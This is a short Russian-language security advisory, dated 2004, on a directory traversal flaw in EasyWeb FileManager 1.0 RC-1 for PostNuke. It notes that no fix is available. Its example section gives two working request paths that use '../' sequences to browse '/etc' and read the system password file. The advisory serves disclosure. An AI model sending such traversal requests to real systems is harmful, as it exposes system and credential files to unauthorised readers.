Security Lab

Уязвимость обхода каталога в EasyWeb FileManager for PostNuke

Дата публикации:26.07.2004
Всего просмотров:1540
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: EasyWeb FileManager 1.0 RC-1

Описание: Уязвимость обхода каталога в EasyWeb FileManager for PostNuke позволяет удаленному пользователю просматривать произвольные каталоги на целевой системе.

Пример/Эксплоит:

/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc

/index.php?module=ew_filemanager&type=admin&func=manager&pa thext=../../../etc/&view=passwd

URL производителя:http://home.postnuke.ru/index.php?module=subjects&func=listcat&catid=2

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: EasyWeb FileManager Directory Traversal